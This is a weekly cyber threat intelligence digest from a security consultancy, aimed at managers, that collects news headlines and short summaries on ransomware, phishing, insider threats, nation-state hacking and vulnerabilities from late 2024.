Ransomware Costs Manufacturing Sector $17bn in Downtime - Infosecurity Magazine

Ransomware Victims

UK hospital resorts to paper and postpones procedures after cyber attack

Alder Hey Children’s Hospital confirms hackers gained access to patient data through digital gateway service | ITPro

Arrowe Park: 'Longer A&E wait times' continue after cyber attack - BBC News

Cyber attack hits three NHS Liverpool hospitals | UKAuthority

British telecoms giant BT confirms attempted cyber attack after ransomware gang claims hack | The Record from Recorded Future News

Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra

Ransomware Attack Disrupts Operations at US Contractor ENGlobal - Infosecurity Magazine

Bologna FC Hit By 200GB Data Theft and Ransom Demand - Infosecurity Magazine

Stoli Vodka and Kentucky Owl File for Bankruptcy Following Cyber Attack, Russian Seizures | NTD

Vodka maker Stoli files for bankruptcy in US after ransomware attack

Italian football club Bologna FC says company data stolen during ransomware attack | The Record from Recorded Future News

Phishing & Email Based Attacks

Novel phising campaign uses corrupted Word documents to evade security

Corrupted Word Files Fuel Sophisticated Phishing Campaign - Infosecurity Magazine

This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar

This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How

Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences

Nearly half a billion emails to businesses contain malicious content, Hornet Security report finds

KnowBe4 Releases the Latest Phishing Trends Report

GenAI makes phishing attacks more believable and cost-effective - Help Net Security

New Rockstar 2FA phishing service targets Microsoft 365 accounts

North Korean Hacking Group Launches Undected Malwareless URL Phishing Attacks

HR and IT are among top-clicked phishing subjects

Top Five Industries Aggressively Targeted By Phishing Attacks

Don't Fall For This "Sad Announcement" Phishing Scam

Defending Against Email Attachment Scams - Security Boulevard

Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media

50 Servers Linked to Cyber Crime Marketplace and Phishing Sites Seized by Law Enforcement - SecurityWeek

This sneaky phishing attack is a new take on a dirty old trick | PCWorld

Phishing attacks rose by more than 600% in the buildup to Black Friday | Security Magazine

Other Social Engineering

Why You Must Beware Of Dangerous New Scam-Yourself Cyber Attacks

North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC

Spotting the Charlatans: Red Flags for Enterprise Security Teams - SecurityWeek

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

Artificial Intelligence

GenAI makes phishing attacks more believable and cost-effective - Help Net Security

Cyber criminals already using AI for most types of scams, FBI warns | Cybernews

How laws strain to keep pace with AI advances and data theft | ZDNET

FBI Warns GenAI is Boosting Financial Fraud - Infosecurity Magazine

Teenagers leading new wave of cyber crime - Help Net Security

Cyber security professionals call for AI regulations

Cyber security in 2025: AI threats & zero trust focus

Do Macs get viruses? The answer is yes – and AI-powered malware is a growing threat, new report claims | TechRadar

Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat

Treat AI like a human: Redefining cyber security - Help Net Security

AI chatbot startup WotNot leaks 346,000 files, including passports and medical records

25% of enterprises using AI will deploy AI agents by 2025 | ZDNET

The role of artificial intelligence in fostering multifaceted cooperation among BRICS nations - Africa Policy Research Institute (APRI)

2FA/MFA

This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar

This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How

Malware

North Korean Hacking Group Launches Undected Malwareless URL Phishing Attacks

Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica

Venom Spider Spins Web of MaaS Malware

Russia's 'BlueAlpha' APT Hides in Cloudflare Tunnels

Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

New Windows Backdoor Security Warning For Bing, Dropbox, Google Users

Do Macs get viruses? The answer is yes – and AI-powered malware is a growing threat, new report claims | TechRadar

More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader

Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media

SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine

ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against Japan

Security Bite: Threat actors are widely using AI to build Mac malware - 9to5Mac

MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks | Trend Micro (US)

'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims

Mobile

8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

SMEs put at risk by poor mobile security practices

New DroidBot Android malware targets 77 banking, crypto apps

Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek

FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews

The FBI now says encryption is good for you – Computerworld

NSO Group's Pegasus Spyware Detected in New Mobile Devices

Business leaders among Pegasus spyware victims, says security firm | TechCrunch

Smartphone Security Warning—Make Changes Now Or Become A Victim

Many small businesses are falling well short when it comes to cyber security plans | TechRadar

Top 5 Mobile Security Risks for Enterprises - Zimperium

Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges

This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena

Banking apps can now require recent Android security updates

Denial of Service/DoS/DDoS

Misconfigured WAFs Heighten DoS, Breach Risks

How DDoS attacks are shaping esports security and risk management | Insurance Business America

Internet of Things – IoT

From Patchwork to Framework: Towards a Global IoT Security Paradigm - Infosecurity Magazine

Chinese LIDAR Dominance a Cyber Security Threat, Warns Think Tank - Infosecurity Magazine

Data Breaches/Leaks

Russian hacking software used to steal hundreds of MoD log-ins  

760,000 Employee Records From Several Major Firms Leaked Online - SecurityWeek

Over 600,000 people hit in massive data breach — background checks, vehicle and property records | Tom's Guide

Sadiq Khan admits some commuters may never be refunded after TfL cyber attack

Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online

White FAANG Data Export Attack: A Gold Mine for PII Threats

63% of companies plan to pass data breach costs to customers | CSO Online

Deloitte Hacked - Brain Cipher Group Allegedly Stolen 1 TB of Data

Process over top-down enforcement: prevent data leaks

Lessons in cyber security from the Internet Archive Breaches | TechRadar

Cyber attack on debt acquisition firm Cabot involved theft of 394,000 data files, court hears – DataBreaches.Net

AI chatbot startup WotNot leaks 346,000 files, including passports and medical records

Major USAID contractor Chemonics says 263,000 affected by 2023 data breach | The Record from Recorded Future News

Israeli tech firm Silicom denies Iranian claims of Mossad and Unit 8200 links after c | Ctech

Controversial Andrew Tate ‘War Room’ Videos Leaked By Hackers

Organised Crime & Criminal Actors

INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

How laws strain to keep pace with AI advances and data theft | ZDNET

Cyber crime | At least 20% cyber crimes involve dark web usage by attackers: Report - Telegraph India

UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine

Alleged Snowflake Hacker ‘Danger’ to the Public

Russia gives life sentence to Hydra dark web kingpin • The Register

Venom Spider Spins Web of MaaS Malware

Teenagers leading new wave of cyber crime - Help Net Security

Cyber criminals already using AI for most types of scams, FBI warns | Cybernews

German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine

Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown

Eurocops red pill the Matrix 'secure' criminal chat systems • The Register

Police seizes largest German online crime marketplace, arrests admin

50 Servers Linked to Cyber Crime Marketplace and Phishing Sites Seized by Law Enforcement - SecurityWeek

Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers

Scattered Spider Hacking Gang Arrests Mount with California Teen

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Hackers Stole $1.49 Billion in Cryptocurrency to Date in 2024 - SecurityWeek

How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost

North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC

New DroidBot Android malware targets 77 banking, crypto apps

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers

Insider Risk and Insider Threats

65% of employees bypass cyber security policies, driven by hybrid work and flexible access

Inside threats: How can companies improve their cyber hygiene?

Insider Threats vs. Privacy: A Dilemma for IT Professionals

Process over top-down enforcement: prevent data leaks

Macy’s found a single employee hid up to $154 million worth of expenses | CNN Business

Insurance

Does Cyber Insurance Drive Up Ransom Demands?

Re/insurance market must prepare for Single Point of Failure tech outage events: CyberCube - Reinsurance News

Cyber insurance checklist: 12 must-have security features | SC Media

Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media

Supply Chain and Third Parties

Re/insurance market must prepare for Single Point of Failure tech outage events: CyberCube - Reinsurance News

Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar

Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra

Hardening Links in Supply Chain Security | SC Media UK

Fear of cyber attack outweighs investment in security along the supply chain - The Loadstar

Cloud/SaaS

This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar

This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How

CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media

New Rockstar 2FA phishing service targets Microsoft 365 accounts

5 things you should never back up to the cloud

New Windows Backdoor Security Warning For Bing, Dropbox, Google Users

7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments

Outages

Re/insurance market must prepare for Single Point of Failure tech outage events: CyberCube - Reinsurance News

Identity and Access Management

The New Cyber Frontier: Managing Risks in Distributed Teams - Infosecurity Magazine

7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments

Encryption

The Growing Quantum Threat to Enterprise Data: What Next?

FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews

The FBI now says encryption is good for you – Computerworld

This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena

Linux and Open Source

70% of open-source components are poorly or no longer maintained - Help Net Security

Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica

New Report Highlights Open Source Trends And Security Challenges

Passwords, Credential Stuffing & Brute Force Attacks

Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online

North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

Six password takeaways from the updated NIST cybersecurity framework

Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat

Social Media

Tech Support Scams Exploit Google Ads to Target Users | Tripwire

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

Romania to recount votes as TikTok slammed for election role | Stars and Stripes

Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian

Malvertising

Tech Support Scams Exploit Google Ads to Target Users | Tripwire

Regulations, Fines and Legislation

How laws strain to keep pace with AI advances and data theft | ZDNET

EC takes action as member states miss NIS2 directive deadline

NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News

6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra

DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra

An Overview of the NIS2 Directive and Its Implementation in France and Luxembourg | Goodwin - JDSupra

New EU Regulation Establishes European 'Cyber Security Shield' - SecurityWeek

Cyber Security: Council of EU formally adopts Cybersecurity and Cyber Solidarity Act | Practical Law

Cyber security professionals call for AI regulations

Navigating the Changing Cyber Security Regulations Landscape

Employees suffering compliance and security fatigue | theHRD

Models, Frameworks and Standards

EC takes action as member states miss NIS2 directive deadline

NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News

New NIST Guidance Offers Update on Gauging Cyber Performance

DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra

An Overview of the NIS2 Directive and Its Implementation in France and Luxembourg | Goodwin - JDSupra

Six password takeaways from the updated NIST cybersecurity framework

Careers, Working in Cyber and Information Security

Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK

Optimism About Cyber Workforce Advancements | AFCEA International

World Wide Work: Landing a Cyber Security Career Overseas

Law Enforcement Action and Take Downs

INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

Alleged Snowflake Hacker ‘Danger’ to the Public

Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek

German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine

Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown

50 Servers Linked to Cyber Crime Marketplace and Phishing Sites Seized by Law Enforcement - SecurityWeek

US arrests Scattered Spider suspect linked to telecom hacks

UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine

Misinformation, Disinformation and Propaganda

German intelligence launches task force to combat foreign election interference | The Record from Recorded Future News

Cyber Attacks Could Impact Romanian Presidential Race, Officials Claim - Infosecurity Magazine

German intelligence agency warns of 'foreign interference' in upcoming elections

Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian

Romania to recount votes as TikTok slammed for election role | Stars and Stripes

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Cyberwarfare 2025: The rise of AI weapons, zero-days, and state-sponsored chaos

Cyber warfare rising across EU in bid to 'destablise' member states

NATO promises better strategy against cyber attacks and undersea cables – Euractiv

NCSC head warns of fundamental ‘contest for cyber space’ as annual report shows 44% hike in most serious incidents – PublicTechnology

UK Underestimates Threat Of Cyber-Attacks, NCSC | Silicon UK

German intelligence launches task force to combat foreign election interference | The Record from Recorded Future News

Nation State Actors

China

Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks

US government says Salt Typhoon is still in telecom networks | CyberScoop

FBI Tells Telecom Firms to Boost Security Following Wide-Ranging Chinese Hacking Campaign - SecurityWeek

Microsoft spots another China spy crew stealing US data • The Register

US org suffered four month intrusion by Chinese hackers

What is Salt Typhoon? Everything you need to know about 'the worst telecom hack in [US] history' | Mashable

FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews

Australia, Canada, New Zealand, and the US warn of PRC-linked cyber espionage targeting telecom networks

Government Guidance on Chinese Telco Hacking Highlights Threat to Cisco Devices - SecurityWeek

The FBI now says encryption is good for you – Computerworld

US shares tips to block hackers behind recent telecom breaches

White House says at least 8 US telecom firms, dozens of nations impacted by China hacking campaign - ABC News

T-Mobile CSO: Cyber spies' initial access method 'is novel' • The Register

US critical infrastructure, military at risk of Chinese LiDAR tech compromise | SC Media

MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks | Trend Micro (US)

Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024

Romania to recount votes as TikTok slammed for election role | Stars and Stripes

SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine

Russia

The UK is 'widely' underestimating online threats from hostile states and criminals, cyber security chief warns | UK News | Sky News

Russia is exploiting UK’s dependence on technology to cause ‘maximum destruction’, warns GCHQ | The Independent

NATO promises better strategy against cyber attacks and undersea cables – Euractiv

NCSC head warns of fundamental ‘contest for cyber space’ as annual report shows 44% hike in most serious incidents – PublicTechnology

‘Russia can turn the lights off’: how the UK is preparing for cyberwar | Cyberwar | The Guardian

Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

Germany’s cyber security and infrastructure under attack by Russia, chancellor says – POLITICO

Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine

North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

NCA Disrupts Multi-Billion Dollar Russian Money Laundering Network

Russian money laundering networks uncovered linking narco traffickers, ransomware gangs and Kremlin spies | The Record from Recorded Future News

She Was a Russian Socialite and Influencer. Cops Say She’s a Crypto Laundering Kingpin | WIRED

Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024

Russian programmer says FSB agents planted spyware on his Android phone | TechCrunch

Spy v Spy: Russian APT Turla Caught Stealing From Pakistani APT - SecurityWeek

Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek

Ransomware suspect Wazawaka reportedly arrested by Russia | The Record from Recorded Future News

Russia gives life sentence to Hydra dark web kingpin • The Register

Putin and ransomware blamed for Stoli US bankruptcy filing • The Register

'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims

Romania's election systems targeted in over 85,000 cyber attacks

Agent for Russia and UK-based Bulgarian planned ‘honeytrap’ for journalist, court hears | UK news | The Guardian

Russian hacking software used to steal hundreds of MoD log-ins  

Iran

Kash Patel, Trump's pick to lead FBI, hit with Iranian cyber attack, sources say - ABC News

North Korea

North Korean Hacking Group Launches Undected Malwareless URL Phishing Attacks

How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost

North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

Kimsuky Group Adopts New Phishing Tactics to Target Victims - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine

Polish Central Banker Testifies in Pegasus Spyware Case – BNN Bloomberg

How widespread is mercenary spyware? More than you think - Help Net Security

Study shows potentially higher prevalence of spyware infections than previously thought | CyberScoop

NSO Group's Pegasus Spyware Detected in New Mobile Devices

Business leaders among Pegasus spyware victims, says security firm | TechCrunch

A New Phone Scanner That Detects Spyware Has Already Found 7 Pegasus Infections | WIRED

How a Russian man’s harrowing tale shows the physical dangers of spyware | CyberScoop

Tools and Controls

65% of office workers bypass cyber security to boost productivity - Help Net Security

Storm-1811 exploits RMM tools to drop Black Basta ransomware

5 reasons to double down on network security - Help Net Security

Misconfigured WAFs Heighten DoS, Breach Risks

CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media

Incident Response Playbooks: Are You Prepared?

Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media

7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments

Why Robust API Security is a Must for Your Business - Security Boulevard

Many small businesses are falling well short when it comes to cyber security plans | TechRadar

Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK

Six password takeaways from the updated NIST cybersecurity framework

Does Cyber Insurance Drive Up Ransom Demands?

Insider Threats vs. Privacy: A Dilemma for IT Professionals

New NIST Guidance Offers Update on Gauging Cyber Performance

Shorter Lifespan Reduces Digital Certificate Vulns

How to talk to your board about tech debt | CIO

Modernizing incident response in the era of cloud and AI - TechTalks

Reports Published in the Last Week

NCSC Annual Review 2024 - NCSC.GOV.UK

EU’s first ever report on the state of cyber security in the Union | ENISA

KnowBe4 Releases the Latest Phishing Trends

Half of UK businesses have experienced a cyber attack. How can you protect yourself? - ByteStart

Other News

Hackers Can Access Laptop Webcams Without Activating LED Indicator

Many small businesses are falling well short when it comes to cyber security plans | TechRadar

71% of US Adults Have Dangerous Online Security Habits This Year, CNET Survey Finds - CNET

Sadiq Khan admits some commuters may never be refunded after TfL cyber attack

Your Kids Are Probably Compromising Your Online Security | Next Avenue

As Device Dependency Grows, So Do The Risks

Nordics move to deepen cyber security cooperation | Computer Weekly

Re/insurers’ operations exposed to cyber threats, says S&P - Reinsurance News

The UK’s cyber security strategy is no longer fit for purpose

Christmas is Coming: Cyber Security Lessons from the Holidays - Security Boulevard

In the new space race, hackers are hitching a ride into orbit

SQL Injection Prevention: 6 Strategies - Security Boulevard

The Legal Landscape Of Privacy: Why Lawyers Must Keep Up With Change - Above the Law

Microsoft confirms the Windows 11 TPM security requirement isn't going anywhere

Why OT environments are vulnerable – and what to do about it | SC Media

Almost all top US retailers were hacked in 2024 | Chain Store Age

Data-rich universities are both targets and treasure troves | Times Higher Education (THE)

Vulnerability Management

Microsoft Warns 400 Million PC Owners—This Ends Your Windows Updates

70% of open-source components are poorly or no longer maintained - Help Net Security

Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar

Want to Grow Vulnerability Management into Exposure Management? Start Here!

Vulnerabilities

Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449) - Help Net Security

Cisco ASA flaw CVE-2014-2120 is being exploited in the wild

Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek

Bootloader Vulnerability Impacts Over 100 Cisco Switches - SecurityWeek

Critical Vulnerability Found in Zabbix Network Monitoring Tool - SecurityWeek

CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media

Cisco Warns of Exploitation of Decade-Old ASA WebVPN Vulnerability

CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel

TP-Link Archer Zero-Day Vulnerability Let Attackers Inject Malicious Commands

Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access

PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785) - Help Net Security

CISA Warns of Zyxel Firewall Vulnerability Exploited in Attacks - SecurityWeek

CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel

Japan warns of IO-Data zero-day router flaws exploited in attacks

Rather than fixing its old routers, D-Link is telling customers to upgrade

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Phishing Attacks Dominate Threat Landscape in Q3 2024

ReliaQuest's recent report reveals that spear phishing attacks accounted for 46% of security incidents in Q3 2024, becoming the most prevalent threat. High employee turnover and accessible phishing kits contribute to this trend, with untrained new hires increasing vulnerability. The report also highlights a 20% surge in cloud-based security threats and a 7% rise in insider threat activity, with cyber criminals offering up to $10,000 weekly for insider assistance. Despite awareness of these risks, organisations continue to face significant challenges in mitigating them.

Rising Cyber Threat Driven by Single Point of Failure Risk

CyberCube reports that escalating cloud service provider outages and single point of failure events are significantly increasing the risk of unplanned technology outages for organisations. These disruptions are accelerating, impacting critical services across sectors. The report highlights that the Energy & Utilities industry is highly exposed with varying security levels, while the Transportation & Logistics sector is exposed but more secure. Many US public sector entities are under-secured despite high exposure to cyber threats. It emphasises that insurers must adapt by refining policy language, enhancing threat intelligence, and collaborating with governments to mitigate these evolving risks.

Cloned Customer Voice Beats Bank Security Checks

Recent investigations have revealed that AI-cloned voices can bypass voice recognition security in banking systems. A BBC test showed that cloned voices successfully overcame voice ID checks at major banks, including Santander and Halifax. Despite assurances from banks about the security of voice ID, the ease with which these systems were breached, even using basic equipment, highlights significant vulnerabilities. Cyber security experts warn that the rapid advancement of generative AI presents new risks to biometric authentication methods. This raises concerns about the effectiveness of current security measures and underscores the need for enhanced protections against sophisticated AI-enabled fraud.

Avoiding Cyber Complacency as a Small Business

A recent survey revealed that half of all UK businesses, including many small and medium-sized enterprises, experienced a cyber attack in the past year. Despite this high incidence, only 22% have a formal incident response plan, indicating widespread cyber complacency. With the average cost to remedy an attack estimated at £21,000, small businesses are at significant financial risk. Many maintain outdated security measures and prioritise other concerns due to limited resources. To mitigate these risks, organisations are advised to stay vigilant, educate employees on threats like phishing, implement robust backup solutions, and develop clear disaster recovery plans.

Your IT Infrastructure May Be More Outdated Than You Think

Kyndryl's recent survey reveals a significant disconnect between CEOs and IT leaders regarding IT infrastructure readiness. While about two-thirds of CEOs are concerned their IT systems are outdated or nearing end-of-life, 90% of IT leaders believe their infrastructure is best in class. Contradictorily, only 39% of IT leaders feel prepared to manage future risks and disruptions, and 44% of executives admit their IT systems have aged past expected lifespans. The report underscores the need for continual reassessment of IT tools to balance operational needs with innovation, as outdated systems can quickly hinder an organisation's competitiveness.

Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey

Howden's research has revealed that cyber attacks have cost UK businesses £44 billion in lost revenue over the past five years. Over half of these businesses, particularly those with revenues over £100 million, have suffered at least one cyber attack, with compromised emails and data theft being the most common causes. Despite this significant impact, the uptake of basic cyber security measures remains low, with only 61% using antivirus software and 55% employing network firewalls. The report suggests that implementing fundamental cyber security practices could reduce cyber attack costs by up to 75%, saving approximately £30 billion over five years.

83% of Organisations Reported Insider Attacks in 2024

A publication by news site Cybersecurity Insiders reports that 83% of organisations experienced at least one insider attack in the past year. The incidence of insider threats has escalated, with the percentage of organisations facing between 11 to 20 attacks increasing from 4% to 21% in the last 12 months. Despite 93% recognising the importance of strict visibility and control, only 36% have effective solutions in place. Recovery costs are significant, with 32% of organisations spending between $100,000 and $499,000, and 21% facing costs between $1 million and $2 million. Lack of employee awareness is a major factor, with 32% citing it as a contributor to attacks.

Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US

Blue Yonder, a supply chain software company, has experienced a ransomware attack that disrupted services for major clients. The incident impacted key customers, including Starbucks and leading UK supermarkets like Morrisons and Sainsbury's, causing operational disruptions and forcing activation of contingency plans. Despite working with external cyber security experts, Blue Yonder has yet to provide a timeline for restoration. This event underscores the increasing vulnerability of supply chains to cyber attacks. A recent survey found that 62% of organisations faced ransomware attacks from software supply chain partners in the past year, highlighting the widespread nature of these threats.

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

Microsoft has reported that North Korean hackers have stolen over $10 million in cryptocurrency through sophisticated social engineering campaigns on LinkedIn. These cyber security threats are escalating, with attackers posing as recruiters or venture capitalists to trick targets into downloading malware. Despite increased awareness, organisations remain vulnerable as hackers use artificial intelligence tools to create convincing fake profiles and documents. North Korean IT workers abroad have also generated at least $370,000 through legitimate work, but pose additional risks by abusing access to steal intellectual property and demand ransoms.

UK Scam Losses Surge 50% Annually to £11.4bn

Cifas reports that UK online fraud losses have surged to over £11bn in the past year, a £4bn increase from the previous year. 15% of the 2000 survey participants lost money to scammers in 2024, up from 10% in 2023, with average losses of £1400 per victim. Less than a fifth recovered their money, and only 28% reported the incidents to the police. Email was the most common fraud channel, cited by nearly 70% of respondents. With scams expected to intensify during the holiday season, there is a pressing need for improved security measures and cross-sector collaboration.

In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security

Enterprises are facing a more sophisticated threat landscape due to digital transformation, hybrid work, and AI adoption, making it imperative to prioritise cyber security. Leadership at the C-suite and board level must drive this change by investing appropriately, as underfunded security can lead to lost revenue and legal issues. A strong, empowered CISO is crucial for identifying vulnerabilities and guiding necessary actions. Adopting frameworks like NIST Cybersecurity Framework 2.0 helps organisations manage risks effectively, promoting prevention and response strategies that can also reduce liability in the event of a breach.

Russian Threat Actors Poised to Cripple Power Grid, UK Warns

The UK government warns that Russian cyber threat actors are poised to conduct cyber attacks that could disrupt critical national infrastructure, potentially "turning off the lights for millions". These threats have already targeted UK media, telecoms, and political institutions. However, experts caution that such rhetoric may overstate Russia's actual capabilities and risk causing unnecessary panic. In response, the government is investing £8.22 million in a new AI cyber lab to bolster national security and an additional £1 million to enhance incident response among allies.

Sources:

https://informationsecuritybuzz.com/phishing-attacks-dominate-threat-lands/

https://www.emergingrisks.co.uk/rising-cyber-threat-driven-by-single-point-of-failure-risk/

https://www.bbc.co.uk/news/articles/c1lg3ded6j9o

https://betanews.com/2024/11/28/avoiding-cyber-complacency-as-a-small-business/

https://www.cio.com/article/3610867/your-it-infrastructure-may-be-more-outdated-than-you-think.html

https://www.insurancejournal.com/news/international/2024/11/27/802913.htm

https://securityintelligence.com/articles/83-percent-organizations-reported-insider-threats-2024/

https://www.techmonitor.ai/technology/cybersecurity/blue-yonder-ransomware-attack-disrupts-supply-chains-across-uk-and-us

https://thehackernews.com/2024/11/north-korean-hackers-steal-10m-with-ai.html

https://www.infosecurity-magazine.com/news/uk-scam-losses-surge-50-annually/

https://securityboulevard.com/2024/11/in-a-growing-threat-landscape-companies-must-do-three-things-to-get-serious-about-cybersecurity/

https://www.computerweekly.com/news/366616324/Russian-threat-actors-poised-to-cripple-power-grid-UK-warns

Governance, Risk and Compliance

Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters

What Companies Can Do To Protect Against Cyber Attacks … and the Litigation That Often Follows | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

Beyond the Technical: The Evolving CISO - InfoRiskToday

What Does Enterprise-Wide Cyber Security Culture Look Like?

Howden urges insurers to tackle cyber cover penetration gap as 52% report attack in last five years | Insurance Times

In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security - Security Boulevard

Cyber Security Under Threat: New Study Exposes 'Security Chaos' | Pressat

What is compliance risk? | Definition from TechTarget

Top challenges holding back CISOs’ agendas | CSO Online

The CISO as a Chess Piece: A Comprehensive Strategic Analysis | Mandelbaum Barrett PC - JDSupra

Cyber Security Toolkit for Boards: updated briefing pack... - NCSC.GOV.UK

Threats

Ransomware, Extortion and Destructive Attacks

Five Ransomware Groups Responsible for 40% of Cyber-Attacks in 2024 - Infosecurity Magazine

One of the nastiest ransomware groups around may have a whole new way of doing things | TechRadar

